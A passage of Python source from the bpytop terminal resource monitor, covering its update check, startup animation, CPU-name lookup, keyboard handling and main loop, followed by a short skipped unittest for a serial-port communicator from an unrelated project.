with urllib.request.urlopen("https://github.com/aristocratos/bpytop/raw/master/bpytop.py", timeout=5) as source: # type: ignore
for line in source:
line = line.decode("utf-8")
if line.startswith("VERSION: str ="):
cls.version = line[(line.index("=")+1):].strip('" \n')
break
except Exception as e:
errlog.exception(f'{e}')
else:
if cls.version != VERSION and which("notify-send"):
try:
subprocess.run(["notify-send", "-u", "normal", "BpyTop Update!",
f'New version of BpyTop available!\nCurrent version: {VERSION}\nNew version: {cls.version}\nDownload at github.com/aristocratos/bpytop',
"-i", "update-notifier", "-t", "10000"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
except Exception as e:
errlog.exception(f'{e}')
class Init:
running: bool = True
initbg_colors: List[str] = []
initbg_data: List[int]
initbg_up: Graph
initbg_down: Graph
resized = False
@classmethod
def start(cls):
Draw.buffer("init", z=1)
Draw.buffer("initbg", z=10)
for i in range(51):
for _ in range(2): cls.initbg_colors.append(Color.fg(i, i, i))
Draw.buffer("banner", (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(11)}{Colors.black_bg}{Colors.default}'
f'{Fx.b}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}{Color.fg("#50")}'), z=2)
for _i in range(7):
perc = f'{str(round((_i + 1) * 14 + 2)) + "%":>5}'
Draw.buffer("+banner", f'{Mv.to(Term.height // 2 - 2 + _i, Term.width // 2 - 28)}{Fx.trans(perc)}{Symbol.v_line}')
Draw.out("banner")
Draw.buffer("+init!", f'{Color.fg("#cc")}{Fx.b}{Mv.to(Term.height // 2 - 2, Term.width // 2 - 21)}{Mv.save}')
cls.initbg_data = [randint(0, 100) for _ in range(Term.width * 2)]
cls.initbg_up = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=True)
cls.initbg_down = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=False)
@classmethod
def success(cls):
if not CONFIG.show_init or cls.resized: return
cls.draw_bg(5)
Draw.buffer("+init!", f'{Mv.restore}{Symbol.ok}\n{Mv.r(Term.width // 2 - 22)}{Mv.save}')
@staticmethod
def fail(err):
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Symbol.fail}')
sleep(2)
errlog.exception(f'{err}')
clean_quit(1, errmsg=f'Error during init! See {CONFIG_DIR}/error.log for more information.')
@classmethod
def draw_bg(cls, times: int = 5):
for _ in range(times):
sleep(0.05)
x = randint(0, 100)
Draw.buffer("initbg", f'{Fx.ub}{Mv.to(0, 0)}{cls.initbg_up(x)}{Mv.to(Term.height // 2, 0)}{cls.initbg_down(x)}')
Draw.out("initbg", "banner", "init")
@classmethod
def done(cls):
cls.running = False
if not CONFIG.show_init: return
if cls.resized:
Draw.now(Term.clear)
else:
cls.draw_bg(10)
Draw.clear("initbg", "banner", "init", saved=True)
if cls.resized: return
del cls.initbg_up, cls.initbg_down, cls.initbg_data, cls.initbg_colors
#? Functions ------------------------------------------------------------------------------------->
def get_cpu_name() -> str:
'''Fetch a suitable CPU identifier from the CPU model name string'''
name: str = ""
nlist: List = []
command: str = ""
cmd_out: str = ""
rem_line: str = ""
if SYSTEM == "Linux":
command = "cat /proc/cpuinfo"
rem_line = "model name"
elif SYSTEM == "MacOS":
command ="sysctl -n machdep.cpu.brand_string"
elif SYSTEM == "BSD":
command ="sysctl hw.model"
rem_line = "hw.model"
try:
cmd_out = subprocess.check_output("LANG=C " + command, shell=True, universal_newlines=True)
except:
pass
if rem_line:
for line in cmd_out.split("\n"):
if rem_line in line:
name = re.sub( ".*" + rem_line + ".*:", "", line,1).lstrip()
else:
name = cmd_out
nlist = name.split(" ")
try:
if "Xeon" in name and "CPU" in name:
name = nlist[nlist.index("CPU")+(-1 if name.endswith("CPU") else 1)]
elif "Ryzen" in name:
name = " ".join(nlist[nlist.index("Ryzen"):nlist.index("Ryzen")+3])
elif "Duo" in name and "@" in name:
name = " ".join(nlist[:nlist.index("@")])
elif "CPU" in name and not nlist[0] == "CPU":
name = nlist[nlist.index("CPU")-1]
except:
pass
name = " ".join(name.split())
return name.replace("Processor ", "").replace("CPU ", "").replace("(R)", "").replace("(TM)", "").replace("Intel ", "")
def create_box(x: int = 0, y: int = 0, width: int = 0, height: int = 0, title: str = "", title2: str = "", line_color: Color = None, title_color: Color = None, fill: bool = True, box = None) -> str:
'''Create a box from a box object or by given arguments'''
out: str = f'{Term.fg}{Term.bg}'
if not line_color: line_color = THEME.div_line
if not title_color: title_color = THEME.title
#* Get values from box class if given
if box:
x = box.x
y = box.y
width = box.width
height =box.height
title = box.name
hlines: Tuple[int, int] = (y, y + height - 1)
out += f'{line_color}'
#* Draw all horizontal lines
for hpos in hlines:
out += f'{Mv.to(hpos, x)}{Symbol.h_line * (width - 1)}'
#* Draw all vertical lines and fill if enabled
for hpos in range(hlines[0]+1, hlines[1]):
out += f'{Mv.to(hpos, x)}{Symbol.v_line}{" " * (width-2) if fill else Mv.r(width-2)}{Symbol.v_line}'
#* Draw corners
out += f'{Mv.to(y, x)}{Symbol.left_up}\
{Mv.to(y, x + width - 1)}{Symbol.right_up}\
{Mv.to(y + height - 1, x)}{Symbol.left_down}\
{Mv.to(y + height - 1, x + width - 1)}{Symbol.right_down}'
#* Draw titles if enabled
if title:
out += f'{Mv.to(y, x + 2)}{Symbol.title_left}{title_color}{Fx.b}{title}{Fx.ub}{line_color}{Symbol.title_right}'
if title2:
out += f'{Mv.to(hlines[1], x + 2)}{Symbol.title_left}{title_color}{Fx.b}{title2}{Fx.ub}{line_color}{Symbol.title_right}'
return f'{out}{Term.fg}{Mv.to(y + 1, x + 1)}'
def now_sleeping(signum, frame):
"""Reset terminal settings and stop background input read before putting to sleep"""
Key.stop()
Collector.stop()
Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
Term.echo(True)
os.kill(os.getpid(), signal.SIGSTOP)
def now_awake(signum, frame):
"""Set terminal settings and restart background input read"""
Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
Term.echo(False)
Key.start()
Term.refresh()
Box.calc_sizes()
Box.draw_bg()
Collector.start()
def quit_sigint(signum, frame):
"""SIGINT redirection to clean_quit()"""
clean_quit()
def clean_quit(errcode: int = 0, errmsg: str = "", thread: bool = False):
"""Stop background input read, save current config and reset terminal settings before quitting"""
global THREAD_ERROR
if thread:
THREAD_ERROR = errcode
interrupt_main()
return
if THREAD_ERROR: errcode = THREAD_ERROR
Key.stop()
Collector.stop()
if not errcode: CONFIG.save_config()
Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
Term.echo(True)
if errcode == 0:
errlog.info(f'Exiting. Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
else:
errlog.warning(f'Exiting with errorcode ({errcode}). Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
if not errmsg: errmsg = f'Bpytop exited with errorcode ({errcode}). See {CONFIG_DIR}/error.log for more information!'
if errmsg: print(errmsg)
raise SystemExit(errcode)
def floating_humanizer(value: Union[float, int], bit: bool = False, per_second: bool = False, start: int = 0, short: bool = False) -> str:
'''Scales up in steps of 1024 to highest possible unit and returns string with unit suffixed
* bit=True or defaults to bytes
* start=int to set 1024 multiplier starting unit
* short=True always returns 0 decimals and shortens unit to 1 character
'''
out: str = ""
mult: int = 8 if bit else 1
selector: int = start
unit: Tuple[str, ...] = UNITS["bit"] if bit else UNITS["byte"]
if isinstance(value, float): value = round(value * 100 * mult)
elif value > 0: value *= 100 * mult
else: value = 0
while len(f'{value}') > 5 and value >= 102400:
value >>= 10
if value < 100:
out = f'{value}'
break
selector += 1
else:
if len(f'{value}') < 5 and len(f'{value}') >= 2 and selector > 0:
decimals = 5 - len(f'{value}')
out = f'{value}'[:-2] + "." + f'{value}'[-decimals:]
elif len(f'{value}') >= 2:
out = f'{value}'[:-2]
else:
out = f'{value}'
if short:
out = out.split(".")[0]
if len(out) > 3:
out = f'{int(out[0]) + 1}'
selector += 1
out += f'{"" if short else " "}{unit[selector][0] if short else unit[selector]}'
if per_second: out += "ps" if bit else "/s"
return out
def units_to_bytes(value: str) -> int:
if not value: return 0
out: int = 0
mult: int = 0
bit: bool = False
value_i: int = 0
units: Dict[str, int] = {"k" : 1, "m" : 2, "g" : 3}
try:
if value.lower().endswith("s"):
value = value[:-1]
if value.lower().endswith("bit"):
bit = True
value = value[:-3]
elif value.lower().endswith("byte"):
value = value[:-4]
if value[-1].lower() in units:
mult = units[value[-1].lower()]
value = value[:-1]
if "." in value and value.replace(".", "").isdigit():
if mult > 0:
value_i = round(float(value) * 1024)
mult -= 1
else:
value_i = round(float(value))
elif value.isdigit():
value_i = int(value)
if bit: value_i = round(value_i / 8)
out = int(value_i) << (10 * mult)
except ValueError:
out = 0
return out
def min_max(value: int, min_value: int=0, max_value: int=100) -> int:
return max(min_value, min(value, max_value))
def process_keys():
mouse_pos: Tuple[int, int] = (0, 0)
filtered: bool = False
global ARG_MODE
while Key.has_key():
key = Key.get()
if key in ["mouse_scroll_up", "mouse_scroll_down", "mouse_click"]:
mouse_pos = Key.get_mouse()
if mouse_pos[0] >= ProcBox.x and mouse_pos[1] >= ProcBox.current_y + 1 and mouse_pos[1] < ProcBox.current_y + ProcBox.current_h - 1:
pass
elif key == "mouse_click":
key = "mouse_unselect"
else:
key = "_null"
if ProcBox.filtering:
if key in ["enter", "mouse_click", "mouse_unselect"]:
ProcBox.filtering = False
Collector.collect(ProcCollector, redraw=True, only_draw=True)
continue
elif key in ["escape", "delete"]:
ProcCollector.search_filter = ""
ProcBox.filtering = False
elif len(key) == 1:
ProcCollector.search_filter += key
elif key == "backspace" and len(ProcCollector.search_filter) > 0:
ProcCollector.search_filter = ProcCollector.search_filter[:-1]
else:
continue
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
if filtered: Collector.collect_done.wait(0.1)
filtered = True
continue
if key == "_null":
continue
elif key == "q":
clean_quit()
elif key == "+" and CONFIG.update_ms + 100 <= 86399900:
CONFIG.update_ms += 100
Box.draw_update_ms()
elif key == "-" and CONFIG.update_ms - 100 >= 100:
CONFIG.update_ms -= 100
Box.draw_update_ms()
elif key in ["b", "n"]:
NetCollector.switch(key)
elif key in ["M", "escape"]:
Menu.main()
elif key in ["o", "f2"]:
Menu.options()
elif key in ["h", "f1"]:
Menu.help()
elif key == "z":
NetCollector.reset = not NetCollector.reset
Collector.collect(NetCollector, redraw=True)
elif key == "y":
CONFIG.net_sync = not CONFIG.net_sync
Collector.collect(NetCollector, redraw=True)
elif key == "a":
NetCollector.auto_min = not NetCollector.auto_min
NetCollector.net_min = {"download" : -1, "upload" : -1}
Collector.collect(NetCollector, redraw=True)
elif key in ["left", "right"]:
ProcCollector.sorting(key)
elif key == " " and CONFIG.proc_tree and ProcBox.selected > 0:
if ProcBox.selected_pid in ProcCollector.collapsed:
ProcCollector.collapsed[ProcBox.selected_pid] = not ProcCollector.collapsed[ProcBox.selected_pid]
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "e":
CONFIG.proc_tree = not CONFIG.proc_tree
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "r":
CONFIG.proc_reversed = not CONFIG.proc_reversed
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "c":
CONFIG.proc_per_core = not CONFIG.proc_per_core
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "g":
CONFIG.mem_graphs = not CONFIG.mem_graphs
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "s":
CONFIG.swap_disk = not CONFIG.swap_disk
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "f":
ProcBox.filtering = True
if not ProcCollector.search_filter: ProcBox.start = 0
Collector.collect(ProcCollector, redraw=True, only_draw=True)
elif key == "m":
if ARG_MODE:
ARG_MODE = ""
elif CONFIG.view_modes.index(CONFIG.view_mode) + 1 > len(CONFIG.view_modes) - 1:
CONFIG.view_mode = CONFIG.view_modes[0]
else:
CONFIG.view_mode = CONFIG.view_modes[(CONFIG.view_modes.index(CONFIG.view_mode) + 1)]
Box.proc_mode = True if CONFIG.view_mode == "proc" else False
Box.stat_mode = True if CONFIG.view_mode == "stat" else False
Draw.clear(saved=True)
Term.refresh(force=True)
elif key.lower() in ["t", "k", "i"] and (ProcBox.selected > 0 or ProcCollector.detailed):
pid: int = ProcBox.selected_pid if ProcBox.selected > 0 else ProcCollector.detailed_pid # type: ignore
if psutil.pid_exists(pid):
if key.lower() == "t": sig = signal.SIGTERM
elif key.lower() == "k": sig = signal.SIGKILL
elif key.lower() == "i": sig = signal.SIGINT
try:
os.kill(pid, sig)
except Exception as e:
errlog.error(f'Exception when sending signal {sig} to pid {pid}')
errlog.exception(f'{e}')
elif key == "delete" and ProcCollector.search_filter:
ProcCollector.search_filter = ""
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
elif key == "enter":
if ProcBox.selected > 0 and ProcCollector.detailed_pid != ProcBox.selected_pid and psutil.pid_exists(ProcBox.selected_pid):
ProcCollector.detailed = True
ProcBox.last_selection = ProcBox.selected
ProcBox.selected = 0
ProcCollector.detailed_pid = ProcBox.selected_pid
ProcBox.resized = True
elif ProcCollector.detailed:
ProcBox.selected = ProcBox.last_selection
ProcBox.last_selection = 0
ProcCollector.detailed = False
ProcCollector.detailed_pid = None
ProcBox.resized = True
else:
continue
ProcCollector.details = {}
ProcCollector.details_cpu = []
ProcCollector.details_mem = []
Graphs.detailed_cpu = NotImplemented
Graphs.detailed_mem = NotImplemented
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
elif key in ["up", "down", "mouse_scroll_up", "mouse_scroll_down", "page_up", "page_down", "home", "end", "mouse_click", "mouse_unselect"]:
ProcBox.selector(key, mouse_pos)
#? Pre main -------------------------------------------------------------------------------------->
CPU_NAME: str = get_cpu_name()
THEME: Theme
def main():
global THEME
Term.width = os.get_terminal_size().columns
Term.height = os.get_terminal_size().lines
#? Init -------------------------------------------------------------------------------------->
if DEBUG: TimeIt.start("Init")
#? Switch to alternate screen, clear screen, hide cursor, enable mouse reporting and disable input echo
Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
Term.echo(False)
Term.refresh(force=True)
#? Start a thread checking for updates while running init
if CONFIG.update_check: UpdateChecker.run()
#? Draw banner and init status
if CONFIG.show_init and not Init.resized:
Init.start()
#? Load theme
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Loading theme and creating colors... ")}{Mv.save}')
try:
THEME = Theme(CONFIG.color_theme)
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Setup boxes
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Doing some maths and drawing... ")}{Mv.save}')
try:
if CONFIG.check_temp: CpuCollector.get_sensors()
Box.calc_sizes()
Box.draw_bg(now=False)
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Setup signal handlers for SIGSTP, SIGCONT, SIGINT and SIGWINCH
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Setting up signal handlers... ")}{Mv.save}')
try:
signal.signal(signal.SIGTSTP, now_sleeping) #* Ctrl-Z
signal.signal(signal.SIGCONT, now_awake) #* Resume
signal.signal(signal.SIGINT, quit_sigint) #* Ctrl-C
signal.signal(signal.SIGWINCH, Term.refresh) #* Terminal resized
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Start a separate thread for reading keyboard input
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting input reader thread... ")}{Mv.save}')
try:
Key.start()
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Start a separate thread for data collection and drawing
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting data collection and drawer thread... ")}{Mv.save}')
try:
Collector.start()
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Collect data and draw to buffer
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Collecting data and drawing... ")}{Mv.save}')
try:
Collector.collect(draw_now=False)
pass
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Draw to screen
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Finishing up... ")}{Mv.save}')
try:
Collector.collect_done.wait()
except Exception as e:
Init.fail(e)
else:
Init.success()
Init.done()
Term.refresh()
Draw.out(clear=True)
if CONFIG.draw_clock:
Box.clock_on = True
if DEBUG: TimeIt.stop("Init")
#? Main loop ------------------------------------------------------------------------------------->
def run():
while not False:
Term.refresh()
Timer.stamp()
while Timer.not_zero():
if Key.input_wait(Timer.left()):
process_keys()
Collector.collect()
#? Start main loop
try:
run()
except Exception as e:
errlog.exception(f'{e}')
clean_quit(1)
else:
#? Quit cleanly even if false starts being true...
clean_quit()
if __name__ == "__main__":
main()
|
test_communicator.py
|
import sys
import unittest
import threading
import time
from websocket import create_connection
try:
from aceinna.framework.communicators import SerialPort
except: # pylint: disable=bare-except
sys.path.append('./src')
from aceinna.framework.communicators import SerialPort
# pylint: disable=missing-class-docstring
@unittest.skip
class TestUARTCommunicator(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_cancel_while_find(self):
communicator = SerialPort()
def do_find_device():
communicator.find_device(lambda provider: {})
thread = threading.Thread(
target=do_find_device, args=())
thread.start()
time.sleep(1)
communicator.close()
self.assertTrue(True, 'Find device')
if __name__ == '__main__':
unittest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.